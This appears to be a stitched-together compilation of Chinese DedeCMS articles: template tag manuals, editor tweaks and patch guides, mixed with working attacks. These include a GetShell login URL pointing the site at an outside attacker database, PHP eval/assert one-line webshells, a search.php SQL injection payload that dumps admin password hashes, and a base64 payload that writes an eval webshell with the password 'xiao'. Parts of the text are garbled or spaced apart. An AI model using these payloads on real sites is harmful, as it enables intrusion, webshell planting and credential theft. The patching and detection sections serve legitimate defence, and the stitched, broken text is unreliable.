dedecms 5.7 shopcar.class.php 被植入一句话 一句话后门利用
dedecms5.7中的ckeditor遇到的一些问题以及解决办法
dedecms5.7中的ckeditor遇到的一些问题以及解决办法使用dedecms5.7中的ckeditor时遇到的一些问题及解决办法:1、ckeditor添加字体:关上include/ckeditor/ckeditor.js,搜寻font_names,找出字体列表。
嵌入所需的中文字体,嵌入后为:需要特别注意的是:添加的字体,要写成诸如“宋体/宋体”的形式,而不是“宋体”。
即“显示的字体名称/实际字体名称”的格式。
2、添加行距按钮:(1)浏览ckeditor的行距插件包(网上很难找出的)并读写至ckeditor/plugins目录下;(2)由于dedecms5.7自己内置了一个dedepage插件,用以嵌入ckeditor自定义插件,在/include/ckeditor/plugins/dedepage文件夹下,关上plugin.js文件在最后面嵌入:requires:['lineheight'];(3)修改/include/ckeditor/ckeditor.inc.php文件,在$toolbar['basic']的最后一行添加元素code,修改后代码如下:$toolbar['basic']=array(array('source','-','templates'),array('cut','copy','paste','pastetext','pastefromword','-','print'),array('undo','redo','-','find','replace','-','selectall','removeformat'),array('showblocks'),array('image','flash','addon '),array('maximize'),'/',array('bold','italic','underline','strike','-'),array('numberedlist','bulletedlist','-','outdent','indent','blockquote'),array('justifyleft','justifycenter','justif yright','justifyblock'),array('table','horizontalrule','smiley','specialchar') ,array('link','unlink','anchor'),'/',array('styles','format','font','fontsize'),array('textcolor','bgcolor','mypage','multipic'),array('lineheight'));关上include/ckeditor/plugins/addon/plugin.js找出以下代码://registerthetoolbarbutton.editor.ui.addbutton('addon',{label:'附件',将上面的icon路径改为/include/ckeditor/images/addon.gif即可。
DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞
DEDECMS(织梦程序)5.5-5.7通杀GetShell漏洞入侵步骤如下:/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd =inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POS T[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r 0t0&_POST[GLOBALS][cfg_dbname]=root把上面validate后面的字母改为当前的验证码,即可直接进入网站后台。
小编分析了一下,此漏洞的前提是必须得到后台路径才能实现,因此大家一定要养成使用DEDECM建站时改后台名字的习惯。
下面给出官方的解决办法:解决办法:找到include/common.inc.php文件,把foreach($_REQUEST as $_k=>$_v){var_dump($_k);if( strlen($_k)>0 && preg_match('#^(cfg_|GLOBALS)#',$_k) ): {exit('Request var not allow!');}}换成//检查和注册外部提交的变量function CheckRequest(&$val) {if (is_array($val)) {foreach ($val as $_k=>$_v) {CheckRequest($_k);CheckRequest($val[$_k]);}} else{if( strlen($val)>0 && preg_match('#^(cfg_|GLOBALS)#',$val) ){exit('Request var not allow!');}}}CheckRequest($_REQUEST);网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell前题条件,必须准备好自己的dede数据库,然后插入数据:insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}');再用下面表单提交,shell 就在同目录下1.php。
php一句话木马原理
php一句话木马原理PHP一句话木马原理。
PHP一句话木马是一种常见的网络攻击手段,它可以让攻击者在受害者的服务器上执行恶意代码,从而获取服务器的控制权。
在本文中,我们将深入探讨PHP一句话木马的原理,以帮助读者更好地理解和防范这种安全威胁。
首先,让我们来了解一下PHP一句话木马的基本原理。
一句话木马实际上是一段经过编码的恶意PHP代码,它通常非常短小,只有一行甚至几个字符。
攻击者可以将这段代码插入到受害者的网页文件中,然后通过浏览器访问这个被植入木马的网页,就可以执行其中的恶意代码。
这种攻击手段利用了PHP的动态特性,可以在不修改文件的情况下执行任意代码,因此非常隐蔽和危险。
接下来,我们来详细分析一下PHP一句话木马的原理。
首先,攻击者需要找到一个存在漏洞的网站,比如未经过滤的用户输入、文件上传漏洞等。
然后,攻击者就可以利用这些漏洞将一句话木马代码插入到网站的某个可访问的文件中。
一旦有用户访问了包含木马代码的页面,恶意代码就会被执行,从而实现攻击者的控制目的。
此外,PHP一句话木马还可以通过一些特殊的技术手段来进行加密和混淆,以逃避安全防护系统的检测。
攻击者可以利用base64编码、字符串拼接、变量替换等技术来隐藏木马代码,使其更难以被发现和清除。
这也给网站的安全防护带来了更大的挑战,需要采取更加严密的安全措施来保护网站和用户的数据安全。
针对PHP一句话木马的防范措施,首先是加强对网站的安全审计和漏洞修复工作。
网站管理员需要定期对网站进行安全检查,及时修复存在的漏洞和安全隐患,以防止攻击者利用这些漏洞进行攻击。
其次,加强对用户输入的过滤和验证,避免恶意代码的注入。
同时,也可以通过安全防护软件和WAF(Web应用防火墙)等技术手段来提高网站的安全性,及时发现并阻止恶意攻击。
总的来说,PHP一句话木马是一种常见而危险的网络安全威胁,攻击者可以利用它来获取服务器的控制权,从而对网站和用户数据造成严重危害。
PHP之一句话木马
PHP之⼀句话⽊马什么是⼀句话⽊马⼀句话⽊马就是只需要⼀⾏代码的⽊马,短短⼀⾏代码,就能做到和⼤马相当的功能。
为了绕过waf的检测,⼀句话⽊马出现了⽆数中变形,但本质是不变的:⽊马的函数执⾏了我们发送的命令。
我们如何发送命令,发送的命令如何执⾏?我们可以通过GET 、POST 、COOKIE这三种⽅式向⼀个⽹站提交数据,⼀句话⽊马⽤$_GET[' ']、$_POST[' ']、$_COOKIE[' ']接收我们传递的数据,并把接收的数据传递给⼀句话⽊马中执⾏命令的函数,进⽽执⾏命令。
所以看到的经典⼀句话⽊马⼤多都是只有两个部分,⼀个是可以执⾏代码的函数部分,⼀个是接收数据的部分。
例如:<?php eval(@$_POST['a']); ?>其中eval就是执⾏命令的函数,$_POST['a']就是接收的数据。
eval函数把接收的数据当作PHP代码来执⾏。
这样我们就能够让插⼊了⼀句话⽊马的⽹站执⾏我们传递过去的任意PHP语句。
这便是⼀句话⽊马的强⼤之处。
⽰例:使⽤其他函数制作⼀句话⽊马assert函数<?php assert(@$_POST['a']); ?>create_function函数<?php$fun = create_function('',$_POST['a']);$fun();>把⽤户传递的数据⽣成⼀个函数fun(),然后再执⾏fun()call_user_func回调函数<?php@call_user_func(assert,$_POST['a']);>call_user_func这个函数可以调⽤其它函数,被调⽤的函数是call_user_func的第⼀个函数,被调⽤的函数的参数是call_user_func的第⼆个参数。
dedecms5.7最新sql注射漏洞利用guestbook.php漏洞预警-电脑资料
dedecms5.7最新sql注射漏洞利用guestbook.php漏洞预警-电脑资料影响版本为5.7漏洞文件edit.inc.php具体代码:< ?php if(!defined('DEDEINC')) exit('Request Error!'); if(!empty($_COOKIE['GUEST_BOOK_POS'])) $GUEST_BOOK_POS = $_COOKIE['GUEST_BOOK_POS']; else $GUEST_BOOK_POS = "guestbook.php"; $id = intval($id); if(empty($job)) $job='view'; if($job=='del' && $g_isadmin) { $dsql->ExecuteNoneQuery(" DELETE FROM `#@__guestbook` WHERE id='$id' "); ShowMsg("成功删除一条留言!", $GUEST_BOOK_POS); exit(); } else if($job=='check' && $g_isadmin) { $dsql->ExecuteNoneQuery(" UPDATE `#@__guestbook` SET ischeck=1 WHERE id='$id' "); ShowMsg("成功审核一条留言!", $GUEST_BOOK_POS); exit(); } else if($job=='editok') { $remsg = trim($remsg); if($remsg!='') { //管理员回复不过滤HTML By:Errorera blog: if($g_isadmin) { $msg = "<div class='rebox'>".$msg."</div>\n".$remsg; //$remsg <br /><font color=red>管理员回复:</font> } else { $row = $dsql->GetOne("SELECT msg From `#@__guestbook` WHERE id='$id' "); $oldmsg = "<div class='rebox'>".addslashes($row['msg'])."</div>\n"; $remsg = trimMsg(cn_substrR($remsg, 1024), 1); $msg = $oldmsg.$remsg; } } //这里没有对$msg过滤,导致可以任意注入了By:Errorera home: $dsql->ExecuteNoneQuery("UPDATE `#@__guestbook` SET `msg`='$msg', `posttime`='".time()."' WHERE id='$id' "); ShowMsg("成功更改或回复一条留言!", $GUEST_BOOK_POS); exit(); } //home: if($g_isadmin) { $row =$dsql->GetOne("SELECT * FROM `#@__guestbook` WHERE id='$id'"); require_once(DEDETEMPLATE.'/plus/guestbook-admin.htm'); } else { $row = $dsql->GetOne("SELECT id,title FROM `#@__guestbook` WHERE id='$id'"); require_once(DEDETEMPLATE.'/plus/guestbook-user.htm'); } 漏洞成功需要条件:1. php magic_quotes_gpc=off2.漏洞文件存在 plus/guestbook.php dede_guestbook 表当然也要存在,,电脑资料《dedecms5.7最新sql注射漏洞利用 guestbook.php漏洞预警》(https://www.)。
DedeCMSV5.7标签手册
{dede:booklist row='12' booktype='-1' orderby='lastpost' author='' keyword=''} <a href='[field:bookurl /]'>[field:bookname /]</a><br /> {/dede:booklist}
基本语法
{dede:group row='6' orderby='threads' titlelen='30'} <li> <span><img style="visibility: inherit;" title="[field:groupname/]" src="[field:icon/]" /></span > <span><a href="[field:url/]" title="[field:groupname/]" target="_blank">[field:groupname/]</a> </span> </li> {/dede:group}
基本语法
{dede:feedback} <ul> <li class='fbtitle'>[field:username function="(@me=='guest' ? '游客' : @me)"/] 对 [field:titl e/] 的评论:</li> <li class='fbmsg'> <a href="plus/feedback.php?aid=[field:aid/]" class='fbmsg'>[field:msg /]</a> </li> </ul> {/dede:feedback}
DEDECMS 5.7 将data目录迁移后,网站地图无法打开和更新的解决方法
今天帮一朋友dedecms安全设置的时候,将DEDECMS 5.7 将data目录迁移后,点击升级地图与rss文件的时候提示dedetag engine create file false,经过下面的修改一切正常了DEDECMS5.7 SP1版本,根据官方提示强烈建议下,将data目录迁移到web以外,网站地图和rss无法打开和更新了,站长朋友都知道,DEDECMS默认生成的rss地图以及网站地图等都是生成在DA TA的文件夹中,但是这个是一个非常重要的文件夹,一般我们在Robots.txt 是禁止搜索引擎爬行这文件夹的,这就造成了,我们生成了地图,但是搜索根本就找不到的尴尬,下面就教大家如何更改自动生成的目录下面是详细的步骤:1,首先登录ftp,在根目录下建立rss文件夹2,修改根目录下你的管理员文件夹(默认是dede)下的makehtml_map.php文件将17行的$cfg_cmspath."/data/sitemap.html";改为代码如下:$cfg_cmspath."/sitemap.html"; 将22行的$cfg_cmspath."/data/rssmap.html";改为代码如下:$cfg_cmspath."/rssmap.html";17行是普通网站地图,22行是RSS的网站地图3,修改根目录下include下面的arc.rssview.class.php将71行的代码如下:$murl = $GLOBALS['cfg_cmspath']."/data/rss/".$this->TypeID.".xml";改为代码如下:$murl = $GLOBALS['cfg_cmspath']."/rss/".$this->TypeID.".xml";4,修改根目录下include下的sitemap.class.php将57行的代码如下:$typelink = $GLOBALS['cfg_cmsurl']."/data/rss/".$row->id.".xml";改为代码如下:$typelink = $GLOBALS['cfg_cmsurl']."/rss/".$row->id.".xml";将94行的代码如下:$typelink = $GLOBALS['cfg_cmsurl']."/data/rss/".$row->id.".xml";改为代码如下:$typelink = $GLOBALS['cfg_cmsurl']."/rss/".$row->id.".xml";5,修改/templets/default模板文件head.htm在11行左右找到代码如下:<li class="r3"><a href="{dede:global.cfg_dataurl/}/sitemap.html">网站地图</a></li> 2.<li class="r4"><a href="{dede:global.cfg_dataurl/}/rssmap.html">RSS订阅</a></li>> [code]改为</p> <p>[code]<li class="r3"><a href="{dede:global.cfg_cmsurl/}/sitemap.html">网站地图</a></li> 2.<li class="r4"><a href="{dede:global.cfg_cmsurl/}/rssmap.html">RSS订阅</a></li>6,进入后台,更新网站地图,更新RSS文件,更新主页。
如何解决dede黑客挂马问题
在上一篇文章dede最新漏洞以及黑客木马特征中,讲述了2013年6月份爆发的dede 5.7 sp1黑客挂马的木马特征。
从中我们可以看到,dedecms后台管理系统升级之后依旧存在很多不为人知的漏洞,并且360网站安全检测也非常配合的将网站的漏洞暴露在黑客面前。
为此黑客们无需花多少时间找寻可注入的路径,直接就可以通过漏洞提权拿站注入木马。
具体360网站安全检测地址疯子就不透露了,以免被有心人利用,用来为祸网络。
网站被入侵的途径,这次所遇到就是DNS入侵。
DNS入侵往往防不胜防,对此疯子也中招。
网络端口全开,黑客一下子进入侵进来。
如果你发现还好,否则不通过百度搜索引擎是查不出网站被入侵的。
这年头,只有中招之后才知道网络安全的可贵,才开始重视网站防护。
网站被劫持之后,如何删除木马,如何解决被黑客挂马的问题?首先一点修改主页模板,删除</head>后面的{dede:dsv/}或者{dede:dinfo/}这个调用标签。
然后找到根目录/include/taglib/dsv.lib.php或者/include/taglib/dinfo.lib.php进行删除,然后就可以发现网站已经恢复了。
不要以为现在就万事大吉,让人恐怖的还在后头。
通过dedecms后台管理:系统-》系统用户管理,你会发现,在系统管理用户中发现一个新的超级管理员。
删除之后,系统还会提示不能删除超级管理员,必须要到数据库数据表中才能删除。
那么如何删除超级管理员呢?通过《dedecms如何删除admin 超级管理员或者对管理员进行降权操作?》一文所介绍的问题,我们可以通过SQL数据库语言,将admin改成被篡改的超级用户的名称,这样就可以实现绝对防护。
具体路径:系统-》SQL命令行工具-》执行SQL语言。
第三步,查看自定义宏标记。
路径:模板-》自定义宏标记。
中了木马病毒的网站在这里会出现两个被黑客定义的宏标记,主要是对网站全局变量的控制。
dedecms,在模板里引入php文件
dedecms,在模板里引入php文件篇一:织梦标签引入共用html1.无法在这个位置找到: {dede:include filename=织梦模板include插入非模板目录文件出现“无法在这个位置找到”错误的解决办法以下是dede V55_UTF8 查dede include标签手册(3) include 引入一个文件,形式为:{dede:include file='文件名称' ismake='是否为dede板块模板(yes/no)'/}对文件的搜索路径为顺序为:绝对路径、include文件夹,CMS安装目录,CMS主模板目录其实根本不是这个样子的,如果你要引用一个其它目录的东西如:{dede:include filename=/haixiait/template/default/inc_head.htm/} 那么就会返回为空字符串,很显然,并没有对文件进行引用.下面经过改造就可以引用各个目录的文件了.(很简单,下面加粗蓝色字体为修改部分)文件目录为:dede安装根目录/include/dedetag.class.php //引入文件function IncludeFile($filename,$ismake='no') {global $cfg_df_style;$restr = '';if($filename==''){return '';}if( file_exists(DEDEROOT./templets/.$filename) ){$okfile = DEDEROOT./templets/.$filename;}else if(file_exists(DEDEROOT.'/templets/'.$cfg_df_st yle.'/'.$filename) ) {$okfile = DEDEROOT.'/templets/'.$cfg_df_style.'/&# 39;.$filename;}else if(file_exists(DEDEROOT.$filename) ){$okfile = DEDEROOT.$filename;}else{return 无法在这个位置找到:$filename;}//编译if($ismake!=no){require_once(DEDEINC./channelunit.func.php); $dtp = new DedeT agParse();$dtp-LoadT emplet($okfile);MakeOneT ag($dtp,$this-refObj);$restr = $dtp-GetResult();}else{$fp = @fopen($okfile,r);while($line=fgets($fp,1024)) $restr.=$line;fclose($fp);}return $restr;}2.图片以及其他文件样式、js导入路径标签{dede:global.cfg_cmspath/} 是dedecms 的安装目录,一般就是网站的根目录。
织梦漏洞修复大全
很多人说dedecms不好,因为用的人多了,找漏洞的人也多了,那么如果我们能修复的话,这些都不是问题.好,我们来一个一个修复。
修复方法都是下载目录下该文件,然后替换或添加部分代码,保存后上传覆盖(记得先备份),这样的好处是防止用懒人包上传之后因为UTF8和GBK不同产生乱码,或者修改过这几个文件,然后直接修改的部分被替换掉,那之前就白改了,找起来也非常的麻烦。
如果你搜索不到,看行数,找相近的,然后将我标记红色的部分复制到对应位置。
任意文件上传漏洞修复一、/include/dialog/select_soft_post.php文件,搜索(大概在72行的样子)$fullfilename = $cfg_basedir.$activepath.'/'.$filename;修改为if(preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($filename))) { ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); exit(); } $fullfilename =$cfg_basedir.$activepath.'/'.$filename;;二、后台文件任意上传漏洞/dede/media_add.php或者/你的后台名字/media_add.php搜索$fullfilename = $cfg_basedir.$filename;(大概在69行左右) 替换成if(preg_match('#\.(php|pl|cgi|asp|aspx|jsp|php5|php4|php3|shtm|shtml)[^a-zA-Z0-9]+$#i', trim($filename))) { ShowMsg("你指定的文件名被系统禁止!",'javascript:;'); exit(); } $fullfilename = $cfg_basedir.$filename;三、/include/uploadsafe.inc.php (有2个地方:)1、搜索 ${$_key.'_size'} = @filesize($$_key);}(大概在42,43行左右)替换成${$_key.'_size'} = @filesize($$_key);} $imtypes = array("image/pjpeg", "image/jpeg", "image/gif", "image/png", "image/xpng", "image/wbmp", "image/bmp");if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes)) { $image_dd = @getimagesize($$_key); if($image_dd == false){ continue; } if(!is_array($image_dd)) { exit('Upload filetype not allow !'); } }如果修改后出现文章页面空白页,请仔细查看代码是否多了或者少了大括号},本文件44行是空的,没有代码,请注意。
最新织梦dedecms5.7模板调用标签大全
--------------------------------------------------------------------------------
最新文章调用标签: {dede:arclist row=8 titlelen=24 orderby=pubdate}<li>[field:textlink/]</li> {/dede:arclist}
列表分页调用标签: {dede:pagelist listsize='4' listitem='index pre pageno next end '/}
--------------------------------------------------------------------------------
列表评论调用标签: [field:postnum/]
--------------------------------------------------------------------------------
查阅全文调用标签: <a href="[field:arcurl/]">查阅全文...</a>
[<a href="{dede:field name='phpurl'/}/recommend.php?arcID={dede:field name=ID/}">推荐</a>]
[<a href="{dede:field name='phpurl'/}/feedback.php?arcID={dede:field name=ID/}">评论</a>]
最新整理防范dedecms广告内容插入后门方法介绍
防范d e d e c m s广告内容插入后门方法介绍在信息安全领域,后门是指绕过安全控制而获取对程序或系统访问权的方法。
后门的最主要目的就是方便以后再次秘密进入或者控制系统。
这篇文章主要介绍了防范 d e d e c m s广告内容插入后门,需要的朋友可以参考下。
方法步骤d e d e c m s广告内容没有做限制,可以输入脚本信息,并写入文件,导致木马植入!此补丁,是防止广告里带P H P脚本并写入文件!核心代码:a d_j s.p h p复制代码代码如下://禁止写入和P H P脚本有关字符信息//============================================= =============================i f((s t r r i p o s($a d b o d y,=0)||(s t r r i p o s($a d b o d y,{d e d e :p h p})=0)||(s t r r i p o s($a d b o d y,p h p)=0)){d i e(d o c u m e n t.w r i t e(禁止生成广告,可能存在风险!););}//============================================= =============================m y t a g_j s.p h p复制代码代码如下://禁止写入和P H P脚本有关字符信息//============================================= =============================i f((s t r r i p o s($m y v a l u e s,=0)||(s t r r i p o s($m y v a l u e s,p h p)=0)){d i e(d o c u m e n t.w r i t e(禁止生成广告,可能存在风险!););}//============================================= =============================使用方法:把a d_j s.p h pm y t a g_j s.p h p2个文件解压到p l u g目录中覆盖原文件就可以了!建议覆盖后,再下载 D盾_W e b查杀进行一次全部的查杀,防止以前留下的后门!查杀时请选择查杀全部文件,因为这些后门是 .h t m或 .i n c等扩展方式隐藏着!补充:校园网安全维护技巧校园网络分为内网和外网,就是说他们可以上学校的内网也可以同时上互联网,大学的学生平时要玩游戏购物,学校本身有自己的服务器需要维护;在大环境下,首先在校园网之间及其互联网接入处,需要设置防火墙设备,防止外部攻击,并且要经常更新抵御外来攻击;由于要保护校园网所有用户的安全,我们要安全加固,除了防火墙还要增加如i p s,i d s等防病毒入侵检测设备对外部数据进行分析检测,确保校园网的安全;外面做好防护措施,内部同样要做好防护措施,因为有的学生电脑可能带回家或者在外面感染,所以内部核心交换机上要设置v l a n隔离,旁挂安全设备对端口进行检测防护;内网可能有d d o s攻击或者a r p病毒等传播,所以我们要对服务器或者电脑安装杀毒软件,特别是学校服务器系统等,安全正版安全软件,保护重要电脑的安全;对服务器本身我们要安全s e r v e r版系统,经常修复漏洞及更新安全软件,普通电脑一般都是拨号上网,如果有异常上层设备监测一般不影响其他电脑。
php一句话木马原理
php一句话木马原理PHP一句话木马原理。
PHP一句话木马是指利用PHP语言编写的一句简短的代码,可以在不被察觉的情况下对服务器进行远程控制。
这种木马常常被黑客用来非法获取网站服务器的控制权,进行恶意攻击、窃取数据等违法行为。
了解PHP一句话木马的原理对于网站管理员和开发人员来说至关重要,可以帮助他们更好地保护网站安全,防止遭受攻击。
PHP一句话木马的原理主要是利用PHP语言的特性和服务器的漏洞来实现远程控制。
一般来说,黑客会将一句简短的PHP代码植入到网站的某个文件中,比如图片文件、配置文件等,然后通过特定的URL请求来触发这段代码,从而实现对服务器的控制。
这段PHP代码通常非常短小,甚至只有一行,但却可以实现对服务器的远程控制。
PHP一句话木马的原理涉及到了一些PHP语言的特性,比如eval函数、字符串拼接、文件包含等。
黑客通常会利用这些特性来构造恶意代码,然后通过特定的方式将其植入到目标网站中。
一旦这段恶意代码被执行,黑客就可以通过发送特定的命令来控制服务器,比如执行系统命令、读取文件内容、修改数据库等,从而实现对网站的控制。
为了防范PHP一句话木马的攻击,网站管理员和开发人员需要做好以下几点工作:首先,及时更新服务器和网站的软件,包括操作系统、Web服务器、数据库等,以及相关的PHP插件和扩展。
及时更新可以修复已知的漏洞,从而减少被攻击的风险。
其次,加强对网站文件的权限控制,避免将不必要的文件和目录赋予可执行权限。
合理设置文件权限可以减少黑客对网站文件的篡改和植入恶意代码的可能性。
另外,加强对用户输入的过滤和验证,避免恶意输入导致的安全漏洞。
对于用户提交的数据,要进行严格的过滤和验证,避免恶意代码被执行。
此外,定期对网站进行安全检测和漏洞扫描,及时发现和修复潜在的安全问题。
通过定期的安全检测,可以及时发现网站存在的安全隐患,从而采取相应的措施加以修复。
总的来说,了解PHP一句话木马的原理对于网站安全至关重要。
dedecms{dede:php}标签用法介绍
dedecms{dede:php}标签用法介绍
文章介绍一个在dedecms开发可能会用到的一个标签哦,因为dedecms定制丰富的标签所以大概可以满足我们的需要,但是有的时候我们还是要自己写,下面来看看关于php标签用法介绍。
-
最简单的输入如
一样的用法,上面语句在php写法如下
是不是看上去很像啊,再看一个再有if else 条件判断的
$a="<SPAN class='num active'>";
$b="</SPAN>";
$c="<SPAN class='num'>";
if (@me > 3) @me = $c.@me.$b;
else @me = $a.@me.$b;
[/field:global]
这个在php中写法我就不写了,下面我们要看dede php标签结合起来sql标签使用。
结合SQL查询输出单条内容
是不是很简单啊,有需要学习的朋友可以参考一下本文章哈。
DeDeCMS5.7版本SQL注入漏洞利用
DeDeCMS5.7版本SQL注⼊漏洞利⽤实验声明:本实验教程仅供研究学习使⽤,请勿⽤于⾮法⽤途,违者⼀律⾃⾏承担所有风险!DeDeCMS5.7版本SQL注⼊漏洞利⽤实验⽬的 通过本实验理解DeDeCMS5.7版本存在SQL注⼊漏洞带来的危害,掌握针对漏洞的利⽤⽅法,熟悉CMS框架SQL注⼊漏洞的防护⽅法。
实验环境渗透主机:win2k8⽤户名: 360college密码: 360College⽬标靶机:cms-inject⽤户名: college密码: 360College访问⽹站:http://IP:8081实验步骤第⼀步录⽬标靶机,启动⽹站服务登录主机时,选择360college⽤户登录1、启动phpstudy(桌⾯图标):找到程序启动位置启动服务启动成功时的表现如果,显⽰不是两个绿⾊标志,则等待⼀会,按下重启按钮,再次尝试。
第⼆步渗透平台上访问⽬标⽹站(1)打开云主机,输⼊密码360College登录靶机(选择第⼆个college⽤户)第三步利⽤SQL注⼊漏洞进⾏漏洞利⽤(1)⾸先访问“/data/admin/ver.txt”页⾯获取系统最后升级时间,(判断是否是dede的cms 以及看看是否和这个漏洞相对应)返回内容:(2)访问“/member/ajax_membergroup.php?action=post&membergroup=1”页⾯,若返回内容:表明可以进⾏SQL注⼊。
(3)利⽤SQL注⼊POC进⾏漏洞利⽤执⾏后的效果为直接暴出⽤户名、密码。
与密码相关的信息细节如下其实,在search.php页⾯,也存在注⼊漏洞。
/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a执⾏结果如下:即可得到管理员⽤户名和密码散列值。
织梦开发手册
织梦5.7开发手册基本标签文章Tag调用标签:{dede:tag row='10' getall='1' sort='month'/}<li><a href='[field:link/]'>[field:tag/]</a></li>{/dede:tag}row:调用条数sort='new':排序方式month,rand,week getall='0'获取类型0 为当前内容页TAG标记,1为获取全部TAG标记,底层模板字段,link和tag文章内容调用标签:{dede:field name='body'/} (写在标签里:[field:body/])文章分页调用标签:{dede:pagebreak/}[<a href="{dede:field name='phpurl'/}/stow.php?arcID={dede:field name=ID/}">收藏</a>] [<a href="{dede:field name='phpurl'/}/recommend.php?arcID={dede:field name=ID/}">推荐</a>][<a href="{dede:field name='phpurl'/}/feedback.php?arcID={dede:field name=ID/}">评论</a>][<a href="#" onClick="window.print();">打印</a>][<a href="#" onClick="window.close();">关闭</a>]文章顶客次数标签:<script language="javascript"type="text/javascript">getDigg({dede:field.id/});</script>顶一下:{dede:field.goodpost/} {dede:field.goodper/}% 踩一下:{dede:field.badpost/} {dede:field.badper/}%分享:{dede:bshare/}上一篇下一篇标签: {dede:prenext get='pre'/} {dede:prenext get='next'/}头条推荐调用标签:{dede:arclist row=1 flag=h titlelen=24 orderby=pubdate }<dt> [field:textlink/] (textlink = <a href='arcurl'>title</a>)(typelink = <a href='typeurl'>typename</a>)<span>[field:description/]...</span></dt>{/dede:arclist}flag = 'h' 自定义属性值:头条[h]推荐[c]图片[p]幻灯[f]滚动[s]跳转[j]图文[a]加粗[b] noflag = '' 同flag,但这里是表示不包含这些属性infolen='160' 表示内容简介长度等同于infolengthtitlelen='' 表示标题长度;orderway='desc' 值为desc 或asc 指定排序方式是降序还是顺向排序,默认为降序subday='天数' 表示在多少天以内的文档,通常用于获取指定天数的热门文档、推荐文档、热门评论文档等limit='' 起始,结束表示限定的记录范围(如:limit='1,2')channelid='' 频道IDorderby='' 表示排序方式,默认值是senddate 按发布时间排列。
DedeCmsv5.6嵌入恶意代码执行漏洞及修复漏洞预警-电脑资料
DedeCmsv5.6嵌入恶意代码执行漏洞及修复漏洞预警-电脑资
料
发布时间:2011-03-02
影响版本:
DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
<*参考 toby57*>
测试方法:
注册会员,上传软件:本地地址中填入
a{/dede:link}{dede:toby57
name\="']=0;phpinfo();//"}x{/dede:toby57},
发表后查看或修改即可执行
a{/dede:link}{dede:toby57
name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_ decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ)) ;//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话,,
电脑资料
《DedeCms v5.6 嵌入恶意代码执行漏洞及修复漏洞预警》(https://www.)。
密码xiao
大家懂得
安全建议:
厂商补丁:
DEDECMS
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
临时修复:对上传软件的本地地址进行验证。
DedeCMS5.7标准标签调用手册
1.关键描述调用标签:<meta name="keywords" content="{dede:field name='keywords'/}"><meta name="description" content="{dede:field name='description' function='html2text(@me)'/}">2.模板路径调用标签:{dede:field name='templeturl'/}3.网站标题调用标签:{dede:global name='cfg_webname'/}4.栏目导航调用标签:<a href="/">首页</a></li>{dede:channel type='top' row='8' currentstyle="<li class='thisclass'><a href='~typelink~'>~typename~</a> </li>"}<li><a href='[field:typelink/]' target="_blank">[field:typename/]</a> </li>{/dede:channel}5.指定调用栏目标签:{dede:onetype typeid='ID'}[field:typename /]{/dede:onetype}6.频道栏目调用标签:{dede:channel type='self'}<li><a href='[field:typelink/]'>[field:typename/]</a></li>{/dede:channel}7.友情链接调用标签:{dede:flink row='24' linktype=2/}8.网站版权调用标签:{dede:global name='cfg_powerby'/}9.网站备案调用标签:{dede:global name='cfg_beian'/}10.当前栏目名称标签:{dede:field name='typename'/}11.当前位置调用标签:{dede:field name='position'/}12.列表文章调用标签:{dede:list pagesize='8'}{/dede:list}13.栏目链接调用标签:[field:typelink function='str_replace("a ","a class=ulink ",@me)'/] 14.作者链接调用标签:[field:writer /]15.列表点击调用标签:[field:click/]16.列表评论调用标签:[field:postnum/]17.查阅全文调用标签:<a href="[field:arcurl/]">查阅全文...</a>18.列表时间调用标签:[field:pubdate function="GetDateTimeMK(@me)"/]19.列表分页调用标签:{dede:pagelist listsize='4' listitem='index pre pageno next end '/} 20.文章标题调用标签:{dede:field name="title"/}21.文章来源调用标签:{dede:field name='source'/}22.文章作者调用标签:{dede:field name='writer' /}23.文章时间调用标签:{dede:field name='pubdate' function='GetDateMk(@me)'/}24.文章Tag调用标签:{dede:tag type='current'/}25.文章点击调用标签:<script src="{dede:field name='phpurl'/}/count.php?aid={dede:field name='ID'/}&mid={dede:field name='memberid'/}&view=yes" language="javascript"></script>26.文章内容调用标签:{dede:field name='body'/}27.文章分页调用标签:{dede:pagebreak/}[<a href="{dede:field name='phpurl'/}/stow.php?arcID={dede:field name=ID/}">收藏</a>][<a href="{dede:field name='phpurl'/}/recommend.php?arcID={dede:field name=ID/}">推荐</a>][<a href="{dede:field name='phpurl'/}/feedback.php?arcID={dede:field name=ID/}">评论</a>][<a href="#" onClick="window.print();">打印</a>][<a href="#" onClick="window.close();">关闭</a>]28.文章顶客次数标签:{dede:field name='digg'/} <a href="javascript:Digg('digg',{dede:field name='id'/});">顶一下</a>29.上一篇下一篇标签:{dede:prenext get='pre'/}{dede:prenext get='next'/}30.头条推荐调用标签:{dede:arclist row=1 titlelen=24 orderby=pubdate att=2} <dt> [field:textlink/]<span>[field:des cription/]……</span> </dt> {/dede:arclist}31.最新文章调用标签:{dede:arclist row=8 titlelen=24 orderby=pubdate}<li>[field:textlink/]</li> {/dede:arclist}32.热关键字调用标签:{dede:hotwords num='5' subday='30'/}33.最新图文调用标签:{dede:arclist row=4 titlelen=20 orderby=pubdate type='image.' imgwidth='152' imgheight='98'}<dd><a href="[field:arcurl/]"><img src="[field:picname/]" alt="[field:title/]" ></a><span><a title="[field:title function='htmlspecialchars(@me)'/] " href="[field:arcurl /]">[field:title /]</a></span> </dd>{/dede:arclist}34.推荐文档调用标签:{dede:arclist type='commend' titlelen='40' row='10'} <li><a title="[field:title 